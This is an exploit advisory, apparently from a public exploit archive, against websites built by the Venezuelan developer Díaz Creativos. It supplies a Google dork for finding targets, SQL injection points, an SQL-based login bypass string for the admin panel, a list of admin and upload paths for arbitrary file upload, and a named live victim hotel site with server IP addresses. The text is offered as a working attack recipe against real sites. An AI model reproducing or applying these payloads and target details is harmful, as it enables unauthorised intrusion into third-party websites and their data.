Desarrollado por Díaz Creativos Venezuella Multiple Vuln

1. ####################################################################
2.  
3. # Exploit Title : Desarrollado por Díaz Creativos Venezuella Multiple Vulnerabilities
4. # Author [ Discovered By ] : KingSkrupellos
5. # Team : Cyberizm Digital Security Army
6. # Date : 16/01/2019
7. # Vendor Homepage : diazcreativos.net - diazcreativos.net.ve
8. # Tested On : Windows and Linux
9. # Category : WebApps
10. # Exploit Risk : Medium
11. # Google Dorks : intext:''Desarrollado por: Díaz Creativos'' site:ve
12. # Vulnerability Type : CWE-89 [ Improper Neutralization of
13. Special Elements used in an SQL Command ('SQL Injection') ]
14. CWE-264 [ Permissions, Privileges, and Access Controls ]
15. CWE-592 [ Authentication Bypass Issues ]
16.  
17. ####################################################################
18.  
19. # Vulnerabilities includes :
20. ************************
21.  
22. 1) SQL Injection Vulnerability
23.  
24. 2) Authentication Bypass Vulnerability
25.  
26. 3) Arbitrary File Upload Vulnerability
27.  
28. ####################################################################
29.  
30. # Admin Panel Login Path :
31. *************************
32.  
33. /admin/
34.  
35. # SQL Injection Exploit :
36. ***********************
37.  
38. /contenido.php?id=[SQL Injection]
39.  
40. /THIS-PATH-CHANGES/contenido.php?id=[SQL Injection]
41.  
42. /margarita/contenido.php?id=[SQL Injection]
43.  
44. /merida/contenido.php?id=[SQL Injection]
45.  
46. # Authentication Bypass Exploit :
47. *****************************
48.  
49. Admin username : '=''or'
50.  
51. Admin password : '=''or'
52.  
53. /admin/panel_central.php
54.  
55. /admin/link/
56.  
57. /admin/link/insertar.php
58.  
59. /admin/link/editar.php?id=[ID-NUMBER]
60.  
61. /admin/contenido/
62.  
63. /admin/contenido/insertar.php
64.  
65. /admin/contenido/editar.php?id=[ID-NUMBER]
66.  
67. /admin/banner/
68.  
69. /admin/banner/insertar.php
70.  
71. /admin/banner/editar.php?id=[ID-NUMBER]
72.  
73. /imagenes/banner/[RANDOM-NUMBERS.[jpg-gif-png]
74.  
75. /admin/publicidad/
76.  
77. /admin/publicidad/insertar.php
78.  
79. /admin/publicidad/editar.php?id=[ID-NUMBER]
80.  
81. /admin/hotel/
82.  
83. /admin/hotel/insertar.php
84.  
85. /admin/hotel/editar.php?id=[ID-NUMBER]
86.  
87. /admin/usuario/
88.  
89. /admin/usuario/insertar.php
90.  
91. /admin/usuario/editar.php?id=[ID-NUMBER]
92.  
93. /admin/galeria/
94.  
95. /admin/galeria/insertar.php
96.  
97. /admin/galeria/editar.php?id=[ID-NUMBER]
98.  
99. # Arbitrary File Upload Exploit :
100. ****************************
101.  
102. /ckfinder/ckfinder.html
103.  
104. Directory Path :
105.  
106. /imagenes/galeria/files/.......
107.  
108. /imagenes/galeria/images/.....
109.  
110. ####################################################################
111.  
112. # Example Vulnerable Site :
113. *************************
114.  
115. [+] tibisayhotelboutique.com/contenido.php?id=22%27 =>
116.  
117. [ Proof of Concept ] => archive.fo/ObbWA
118.  
119. Note : (160.153.33.195) => There are 103 domains hosted on this server.
120.  
121. Note : (173.247.251.224) => There are 24 domains hosted on this server.
122.  
123. ####################################################################
124.  
125. # SQL Database Error :
126. **********************
127.  
128. You have an error in your SQL syntax; check the manual
129. that corresponds to your MySQL server version for the right syntax to use near ''61''
130. = id_con AND id_con = galeria_image' at line 1
131.  
132. ####################################################################
133.  
134. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
135.  
136. ####################################################################